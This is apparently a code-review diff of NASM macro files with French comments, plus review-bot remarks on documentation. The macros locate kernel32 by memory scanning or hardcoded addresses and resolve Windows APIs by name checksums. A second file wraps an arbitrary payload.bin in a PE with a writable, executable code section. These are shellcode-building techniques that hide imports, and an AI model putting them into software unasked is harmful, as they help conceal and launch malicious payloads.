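Review bot: The only description of the two ExternImport modes is the French header line `;WIN32.INC_NO_EXTERN_IMPORT => pas d'Import`, which does not say what each mode emits or when a caller must supply the third argument. I would replace it with an English comment such as `; WIN32.INC_NO_EXTERN_IMPORT: when defined, ExternImport emits no extern/import directives and aliases @name to the 3rd argument (a table slot or constant), which is then mandatory; when undefined it emits NASM extern/import, which presumably requires an object output format that supports import rather than a flat binary — confirm`. The `Error WIN32,NO_EXTERN_IMPORT => ExternImport %1,%2,d|[*]` branch only fires for a two-argument call in that mode, so stating the requirement up front saves readers from discovering it through the error macro. The `%define ExternImport_%1` guard also silently ignores a second import of the same symbol with different arguments, which is worth one line of comment.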
|
|
@ -0,0 +1,390 @@
|
|||
; MACROS POUR L'IMPORTATION DE FONCTIONS DE DLLS WIN32 v0.9a
|
||||
; ==========================================================
|
||||
|
||||
|
||||
;WIN32DLL.INC_TABLE_REGISTER = edi = registre qui pointera la table
|
||||
;WIN32DLL.INC_PUSH => sauvegarde des registres sur la pile
|
||||
;WIN32DLL.INC_KERNEL32.DLL = WIN32DLL.INC_9X | WIN32DLL.INC_NT
|
||||
; |WIN32DLL.INC_2000|r contenant l'adresse de base de KERNEL32.DLL
|
||||
;WIN32DLL.INC_BYTE_BEGIN = 252 = 1er byte du codage dans la table
|
||||
|
||||
|
||||
;GetBase r
|
||||
; r -> adresse de base à partir de l'adresse originale contenue dans r
|
||||
|
||||
;GetChecksum(chaine)
|
||||
; EAX -> checksum de chaine
|
||||
;GetVAExportChecksum(base,checksum)
|
||||
; EAX -> VA de la fonction de checksum à partir de l'Export Table de
|
||||
; l'adresse de base de la DLL parcourue | 0
|
||||
|
||||
;DllBegin
|
||||
; Dll kernel32.dll,"kernel32.dll"
|
||||
; [DllFunction LoadLibraryA,...]
|
||||
; [DllFunction GetProcAddress,...]
|
||||
; ...
|
||||
; Dll dll [,"dll"]
|
||||
; DllFunction function [,"function"|d [,d]]
|
||||
; ...
|
||||
; ...
|
||||
;DllEnd
|
||||
;<- WIN32.INC_NO_EXTERN_IMPORT,BYTE.INC_NO_00,FUNCTION.INC_CONVENTION
|
||||
|
||||
;================================= General ===================================
|
||||
%ifndef _WIN32DLL.INC
|
||||
%define _WIN32DLL.INC
|
||||
|
||||
%include "win32.inc"
|
||||
|
||||
%macro WIN32DLL.INC 0
|
||||
%define WIN32DLL.INC_TABLE_REGISTER edi
|
||||
%define WIN32DLL.INC_PUSH
|
||||
%define WIN32DLL.INC_9X 0BFF70000h
|
||||
%define WIN32DLL.INC_NT 077F00000h
|
||||
%define WIN32DLL.INC_2000 077E00000h
|
||||
%define WIN32DLL.INC_KERNEL32.DLL WIN32DLL.INC_9X
|
||||
%define WIN32DLL.INC_BYTE_BEGIN 252
|
||||
%define DllChecksum_Define WIN32DLL.INC_BYTE_BEGIN
|
||||
%define DllFunction_Define WIN32DLL.INC_BYTE_BEGIN+1
|
||||
%define DllDll_Define WIN32DLL.INC_BYTE_BEGIN+2
|
||||
%define DllEnd_Define WIN32DLL.INC_BYTE_BEGIN+3
|
||||
%endmacro
|
||||
|
||||
WIN32DLL.INC
|
||||
|
||||
;=================================== DLLs ====================================
|
||||
%macro GetBase 1
|
||||
And %1,0FFFF0000h
|
||||
GetBase_Boucle:
|
||||
cmp word[%1],'MZ'
|
||||
JX e,GetBase_Fin,+1
|
||||
Sub eax,10000h
|
||||
Jmp GetBase_Boucle,-1
|
||||
GetBase_Fin:
|
||||
%endmacro
|
||||
|
||||
%macro Function_GetChecksum 0
|
||||
Function GetChecksum,GetChecksum_Chaine
|
||||
FunctionBegin
|
||||
pushf
|
||||
push esi
|
||||
push edx
|
||||
cld
|
||||
|
||||
mov esi,[GetChecksum_Chaine]
|
||||
Mov edx,0
|
||||
GetChecksum_BoucleChar:
|
||||
Mov eax,0
|
||||
lodsb
|
||||
shl ax,8 ;AX=cc00
|
||||
add edx,eax ;ajoute le caractère au checksum
|
||||
Cmp eax,0
|
||||
JX z,GetChecksum_Fin,+1 ;si fin de chaîne
|
||||
Mov eax,0
|
||||
lodsb ;AX=cc
|
||||
add edx,eax ;ajoute le caractère au checksum
|
||||
Cmp al,0
|
||||
JX nz,GetChecksum_BoucleChar,-1 ;si pas fin de chaîne
|
||||
GetChecksum_Fin:
|
||||
mov eax,edx
|
||||
pop edx
|
||||
pop esi
|
||||
popf
|
||||
FunctionEnd
|
||||
%endmacro
|
||||
|
||||
%macro Function_GetVAExportChecksum 0
|
||||
Function GetVAExportChecksum,GetVAExportChecksum_VA,GetVAExportChecksum_Checksum
|
||||
FunctionBegin
|
||||
pushf
|
||||
push edi
|
||||
push esi
|
||||
push edx
|
||||
push ecx
|
||||
push ebx
|
||||
cld
|
||||
|
||||
mov esi,[GetVAExportChecksum_VA]
|
||||
mov ebx,esi
|
||||
mov ebx,[byte ebx+03Ch]
|
||||
add ebx,esi ;EBX=adresse header PE
|
||||
mov ebx,[byte ebx+078h]
|
||||
add ebx,esi ;EBX=adresse Export Table
|
||||
mov edx,[byte ebx+018h] ;EDX=nombre noms
|
||||
Mov ecx,0 ;ECX=indice courant liste adresses noms
|
||||
|
||||
GetVAExportChecksum_BoucleNom:
|
||||
mov edi,[byte ebx+020h]
|
||||
add edi,esi ;EDI=adresse liste adresses noms
|
||||
mov edi,[edi+4*ecx]
|
||||
add edi,esi ;EDI=adresse chaîne
|
||||
|
||||
push edx
|
||||
mov edx,[GetVAExportChecksum_Checksum] ;EDX=checksum recherché
|
||||
xchg esi,edi ;ESI=adresse chaîne
|
||||
GetVAExportChecksum_BoucleChar:
|
||||
Mov eax,0
|
||||
lodsb
|
||||
shl ax,8 ;AX=cc00
|
||||
sub edx,eax ;soustrait le caractère du checksum
|
||||
Cmp eax,0
|
||||
JX z,GetVAExportChecksum_FinNom,+1 ;si fin de chaîne
|
||||
Mov eax,0
|
||||
lodsb ;AX=cc
|
||||
sub edx,eax ;soustrait le caractère du checksum
|
||||
Cmp al,0
|
||||
JX nz,GetVAExportChecksum_BoucleChar,-1 ;si pas fin de chaîne
|
||||
GetVAExportChecksum_FinNom:
|
||||
xchg esi,edi ;EDI=adresse chaîne
|
||||
test edx,edx
|
||||
pop edx
|
||||
JX z,GetVAExportChecksum_NomTrouve,+1 ;si checksum recherchée
|
||||
|
||||
inc ecx
|
||||
cmp ecx,edx
|
||||
JX nae,GetVAExportChecksum_BoucleNom,-1 ;si pas fin => boucle suivant
|
||||
Mov eax,0
|
||||
Jmp GetVAExportChecksum_Fin,+1 ;sinon fin
|
||||
|
||||
GetVAExportChecksum_NomTrouve:
|
||||
Mov eax,0
|
||||
mov edi,[byte ebx+024h]
|
||||
add edi,esi ;EDI=adresse liste ordinaux
|
||||
mov ax,[edi+2*ecx] ;AX=ordinal
|
||||
|
||||
mov edi,[byte ebx+01Ch]
|
||||
add edi,esi ;EDI=adresse liste adresses
|
||||
mov eax,[edi+4*eax]
|
||||
add eax,esi ;EAX=adresse fonction
|
||||
|
||||
GetVAExportChecksum_Fin:
|
||||
pop ebx
|
||||
pop ecx
|
||||
pop edx
|
||||
pop esi
|
||||
pop edi
|
||||
popf
|
||||
FunctionEnd
|
||||
%endmacro
|
||||
|
||||
%macro DllBegin 0
|
||||
%ifctx Dll
|
||||
Error WIN32DLL,DllBegin =X=> DllBegin
|
||||
%else
|
||||
%push Dll
|
||||
%undef Dll_LoadLibraryA_Define
|
||||
%undef Dll_GetProcAddress_Define
|
||||
%undef Dll_kernel32.dll_Define
|
||||
%assign Dll_Function_Assign 1
|
||||
%define FUNCTION.INC_CONVENTION Std
|
||||
%ifdef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%ifdef WIN32DLL.INC_PUSH
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
push ebp
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edi
|
||||
push edi
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,esi
|
||||
push esi
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edx
|
||||
push edx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ecx
|
||||
push ecx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebx
|
||||
push ebx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,eax
|
||||
push eax
|
||||
%endif
|
||||
%endif
|
||||
Call %$End,+1
|
||||
%endif
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Dll 1-2
|
||||
%ifctx Dll
|
||||
%define Dll_Dll_Define %1
|
||||
%ifdef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%if %0==2
|
||||
%ifnidn %1,kernel32.dll
|
||||
%define Dll_kernel32.dll
|
||||
db %2,DllDll_Define
|
||||
%endif
|
||||
%else
|
||||
Error WIN32DLL,NO_EXTERN_IMPORT => Dll dll,"dll"
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error WIN32DLL,Dll => DllBegin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro DllFunctionExternImport 2-3
|
||||
%if %0==2
|
||||
%ifstr %2
|
||||
db %2,DllFunction_Define
|
||||
%else
|
||||
db DllChecksum_Define
|
||||
dd ~(%2)
|
||||
%endif
|
||||
%1_Equ equ Dll_Function_Assign
|
||||
ExternImport %1,Dll_Dll_Define,[byte WIN32DLL.INC_TABLE_REGISTER+%1_Equ]
|
||||
%assign Dll_Function_Assign Dll_Function_Assign+4
|
||||
%else
|
||||
ExternImport %1,Dll_Dll_Define,%3
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro DllFunction 1-3
|
||||
%ifctx Dll
|
||||
%ifdef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%if %0>1
|
||||
%ifidn %1,LoadLibraryA
|
||||
%if %0==3
|
||||
DllFunctionExternImport %1,%2,%3
|
||||
%define Dll_LoadLibraryA_Define
|
||||
%endif
|
||||
%elifidn %1,GetProcAddress
|
||||
%if %0==3
|
||||
DllFunctionExternImport %1,%2,%3
|
||||
%define Dll_GetProcAddress_Define
|
||||
%endif
|
||||
%else
|
||||
%ifndef Dll_LoadLibraryA_Define
|
||||
DllFunctionExternImport LoadLibraryA,000023761h ;'oL'+'da'+'iL'+'rb'+'ra'+'Ay'
|
||||
%define Dll_LoadLibraryA_Define
|
||||
%endif
|
||||
%ifndef Dll_GetProcAddress_Define
|
||||
DllFunctionExternImport GetProcAddress,00002DBA1h ;'eG'+'Pt'+'or'+'Ac'+'dd'+'er'+'ss'
|
||||
%define Dll_GetProcAddress_Define
|
||||
%endif
|
||||
%if %0==2
|
||||
%ifstr %2
|
||||
%ifndef Dll_kernel32.dll
|
||||
db "kernel32.dll",DllDll_Define
|
||||
%define Dll_kernel32.dll
|
||||
%endif
|
||||
%endif
|
||||
DllFunctionExternImport %1,%2
|
||||
%else
|
||||
DllFunctionExternImport %1,%2,%3
|
||||
%endif
|
||||
%endif
|
||||
%else
|
||||
Error WIN32DLL,NO_EXTERN_IMPORT => DllFunction function,"function"|d [,d]
|
||||
%endif
|
||||
%else
|
||||
ExternImport %1,Dll_Dll_Define
|
||||
%endif
|
||||
%else
|
||||
Error WIN32DLL,DllFunction => DllBegin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro DllEnd 0
|
||||
%ifctx Dll
|
||||
%ifdef WIN32.INC_NO_EXTERN_IMPORT
|
||||
db DllEnd_Define
|
||||
Function_GetVAExportChecksum
|
||||
%$End:
|
||||
|
||||
%ifnidn WIN32DLL.INC_KERNEL32.DLL,edx
|
||||
Mov edx,WIN32DLL.INC_KERNEL32.DLL
|
||||
%endif
|
||||
|
||||
pop esi ;ESI=offset jump table
|
||||
push esi
|
||||
mov edi,esi ;EDI=offset jump table
|
||||
mov ebp,esi
|
||||
dec ebp ;EBP=offset jump table-1
|
||||
DllEnd_BoucleNom:
|
||||
mov ebx,esi ;EBX=dÚbut chaîne courante
|
||||
DllEnd_BoucleChar:
|
||||
lodsb
|
||||
cmp al,WIN32DLL.INC_BYTE_BEGIN
|
||||
JX b,DllEnd_BoucleChar,-1 ;si <252
|
||||
|
||||
dec esi ;sinon >=252 =>chaine ou fin
|
||||
Mov ah,0
|
||||
mov [esi],ah ;00 de fin de chaîne
|
||||
inc esi
|
||||
|
||||
cmp al,WIN32DLL.INC_BYTE_BEGIN
|
||||
JX e,DllEnd_252,+1 ;si =252
|
||||
cmp al,WIN32DLL.INC_BYTE_BEGIN+2
|
||||
JX a,DllEnd_End,+1 ;si =255
|
||||
|
||||
push edi ;sauve EDI
|
||||
push esi ;sauve ESI
|
||||
JX e,DllEnd_254,+1 ;si =254
|
||||
|
||||
DllEnd_253: ;sinon =253 => fonction
|
||||
push edx ;sauve EDX
|
||||
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
GetProcAddress(edx,ebx)
|
||||
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
pop edx
|
||||
pop esi
|
||||
pop edi
|
||||
stosd ;ajoute à la jump table
|
||||
Jmp DllEnd_BoucleNom,-1
|
||||
|
||||
DllEnd_252: ;=252 => checksum
|
||||
lodsd
|
||||
not eax
|
||||
TemporaryBegin dword,-,eax
|
||||
%define BYTE.INC_TEMPORARY_REGISTER Temporary_Ret
|
||||
GetVAExportChecksum(edx,eax)
|
||||
%undef BYTE.INC_TEMPORARY_REGISTER
|
||||
TemporaryEnd
|
||||
stosd ;ajoute à la jump table
|
||||
Jmp DllEnd_BoucleNom,-1
|
||||
|
||||
DllEnd_254: ;=254 => dll
|
||||
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
LoadLibraryA(ebx)
|
||||
xchg WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
mov edx,eax ;EDX=handle de la DLL
|
||||
pop esi
|
||||
pop edi
|
||||
Jmp DllEnd_BoucleNom,-1
|
||||
|
||||
DllEnd_End: ;=255
|
||||
pop WIN32DLL.INC_TABLE_REGISTER
|
||||
dec WIN32DLL.INC_TABLE_REGISTER
|
||||
%ifdef WIN32DLL.INC_PUSH
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,eax
|
||||
pop eax
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebx
|
||||
pop ebx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ecx
|
||||
pop ecx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edx
|
||||
pop edx
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,esi
|
||||
pop esi
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,edi
|
||||
pop edi
|
||||
%endif
|
||||
%ifnidni WIN32DLL.INC_TABLE_REGISTER,ebp
|
||||
pop ebp
|
||||
%endif
|
||||
%endif
|
||||
%endif
|
||||
%pop
|
||||
%else
|
||||
Error WIN32DLL,DllEnd => DllBegin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%endif
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,3 @@
|
|||
global _start
|
||||
_start:
|
||||
incbin "payload.bin"
|
|
@ -0,0 +1,71 @@
|
|||
%include "pe.inc"
|
||||
|
||||
BIN_Begin
|
||||
MZHeader
|
||||
MZExtendedHeader
|
||||
MZSection.text_Begin
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,MZSection.text_VA(text_string)
|
||||
mov ah,09
|
||||
int 21h
|
||||
mov ax,4C01h
|
||||
int 21h
|
||||
text_string: db 'This program cannot be run in DOS mode.',0Dh,0Ah,'$'
|
||||
MZSection.text_End
|
||||
|
||||
PEHeader
|
||||
%define PEOptionalheader_EipRVA PESection.text_RVA(PayloadEntry)
|
||||
PEOptionalHeader_Begin
|
||||
PEOptionalHeader_Directory Export,0,0
|
||||
PEOptionalHeader_Directory Import,Import_Directorys_RVA,Import_Directorys_VS
|
||||
PEOptionalHeader_End
|
||||
|
||||
PESectionHeader .text,'.text',PESectionHeader_Flags_EXECUTABLECODE | PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_EXECUTEACCESS | PESectionHeader_Flags_READACCESS| PESectionHeader_Flags_WRITEACCESS
|
||||
PESectionHeader .rdata,'.rdata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
|
||||
PESectionHeader .data,'.data',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
|
||||
PESectionHeader .bss,'.bss', PESectionHeader_Flags_DATA0 | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
|
||||
PESectionHeader .idata,'.idata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
|
||||
PESections_Begin
|
||||
|
||||
PESection.text_Begin
|
||||
PayloadEntry:
|
||||
incbin "payload.bin"
|
||||
call [PESection.idata_VA(Import.KERNEL32.ExitProcess)]
|
||||
PESection.text_End
|
||||
|
||||
PESection.rdata_Begin
|
||||
db 0x90
|
||||
PESection.rdata_End
|
||||
|
||||
PESection.data_Begin
|
||||
db 0x90
|
||||
PESection.data_End
|
||||
|
||||
PESection.bss_Begin
|
||||
resb 0x100
|
||||
PESection.bss_End
|
||||
|
||||
PESection.idata_Begin
|
||||
|
||||
Import_Directorys_Begin .idata
|
||||
Import_Directory KERNEL32
|
||||
Import_Directorys_End
|
||||
|
||||
Import_RVAs_Begin KERNEL32
|
||||
Import_RVA KERNEL32,ExitProcess
|
||||
Import_RVAs_End
|
||||
|
||||
Import_VAs_Begin KERNEL32
|
||||
Import_VA KERNEL32,ExitProcess,0BFF8D4CAh
|
||||
Import_VAs_End
|
||||
|
||||
Import_Strings_Begin KERNEL32
|
||||
Import_String_Function KERNEL32,ExitProcess,"ExitProcess",07Fh
|
||||
Import_String_Dll KERNEL32,"KERNEL32.DLL"
|
||||
Import_Strings_End
|
||||
|
||||
PESection.idata_End
|
||||
|
||||
PESections_End
|
||||
BIN_End
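Review bot: The `PESectionHeader .text` line sets PESectionHeader_Flags_WRITEACCESS together with EXECUTEACCESS, so the embedded payload runs from an RWX section; that is presumably intended because payload.bin may decode itself in place, but nothing says so, and an RWX code section both weakens W^X and is a common scanner heuristic. I would add `; .text is RWX on purpose: payloads that decode in place write to their own code — drop WRITEACCESS only for payloads that never self-modify` beside that line. The `%define PEOptionalheader_EipRVA` line spells `Optionalheader` with a lowercase h while every other pe.inc symbol here is `PEOptionalHeader_`; NASM `%define` is case-sensitive, so unless pe.inc reads exactly this spelling the entry point is never set — confirm against pe.inc. The `0BFF8D4CAh` in `Import_VA KERNEL32,ExitProcess` is only a pre-filled IAT value that the loader overwrites, since the Import_Directory macro writes 0 for the timestamp (not bound); a short comment there would stop it being read as a live address.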
|